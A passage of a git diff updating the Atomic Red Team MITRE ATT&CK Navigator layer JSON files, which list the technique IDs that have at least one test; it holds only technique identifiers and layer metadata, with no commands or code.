diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
index 03b04c3f..89915caf 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
@@ -1 +1 @@
-{"version":"3.0","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"3.0","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index dc96ba52..323bade4 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@
-{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"e